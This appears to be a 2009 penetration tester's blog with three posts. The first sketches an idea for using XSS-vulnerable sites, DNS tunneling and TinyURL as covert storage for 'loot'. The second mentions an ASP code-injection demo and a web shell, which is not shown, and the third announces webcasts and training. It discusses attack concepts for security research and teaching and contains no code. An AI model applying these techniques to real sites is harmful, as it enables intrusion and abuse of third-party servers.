Friday, January 30, 2009

Beyond DNS-rebinding

I've been spending a lot of time this month following and contemplating the material out there about DNS-rebinding and the assumptions made in how we browse the web. There's some really great content from rsnake and Kaminsky.

I've been working on a new FUSE powered distributed filesystem that would work as an XSS payload. Think of it this way: instead of stashing your loot on your server or somebody else's--just continuely juggle it between a few servers that allow for a little bit of public control. Say you had access to a couple of XSS-vulnerable servers. After a little bit of AJAX injected into the sites, as long as there is a catalyst (browser hitting one of the vulnerable sites), you can maintain a basic filesystem. Even if it isn't a stored XSS vulnerability, you can still constantly refresh the pages to keep the files "stored." It works for DRAM, why not for this?

So how might we accomplish this? We could use the arbitrary TCP traffic mechanisms referenced in Kaminsky's presentation above, but that would require flash with the javascript. But is there an easier way? Remember Kaminsky's extensive work on DNS tunneling? We could just use AJAX to trigger the DNS requests and then we can stash our files in DNS just like the DNS tunnel techniques.

Ok, so we could control DNS requests and based on timing of the responses we could effectively "save" data. What other possibilities do we have? Some of the rebinding techniques are useful because the Same Origin Policy let's two sites that are considered part of the same domain to share resources. Why bother with DNS? We have a great tool we can leverage to accomplish the same thing: TinyURL.

So I will be writing this up today to submit the BlackHat CFP, and hopefully find time to code it somewhere between all of the Events I'll be teaching/presenting at. Any thoughts or tips from any of you that might have been playing with this lately?

Friday, January 09, 2009

Sometimes simpler is better

I gave a presentation on Essential Pentesting Methodology last night at the monthly SoCalITPro meeting. It was a last minute event, but it went very well and a lot of IT folks got a lean and mean introduction into the issues that surround a successful penetration test.

We also demonstrated an ASP code injection. We had a simple ASP app that wrote files with little input filtering so one could write their own ASP pages remotely. We were running commands and talked about how we could an ASP shell in the webpage itself (have you ever seen PHPShell?). Since we were demonstrating without a formal example, I ended up hacking together an ASP shell script and put it at I wasn't going to bother publishing it since exists, but after checking it out I realize it's a little more complicated than necessary and I was unable to use it for the ASP code injection demonstration I'm cooking up for Core Security's January 22nd Webcast. Thought somebody might find this one useful. -Update: Sorry, that link was originally to another webcast Core is hosting, I've corrected the link.

BTW, there is still room for a few people at the SANS Security 560 Network Penetration Testing with bootcamp. Please email me if you missed the discount code.

Friday, January 02, 2009

Starting 2009 off with a free webcast

I'll be spending a lot of development time in January, then quite a few classes in February. January 22nd I'll be contributing to Core Security's Comprehensive Penetration Testing. I'll be demonstrating using some custom modules and incorporating them into Core's IMPACT Pro software. During the free webcast you will be able to see a discount code that will get you 10% any SANS Sec 560 course.

February starts off with SANS Security 560 in Atlanta, GA and Los Angeles, CA. I'll be giving a presenation on Custom File Systems at SCALE, and also teaching SANS Security 504 in Edmonton, AB. See for the links and more info.

I hope to announce in the next couple of months my personal pet project for 2009, but here's a hint: Yet another cool Javascript payload to use in cross-site style attacks. Hoping it works out well enough I can speak at a few security conferences this year about it.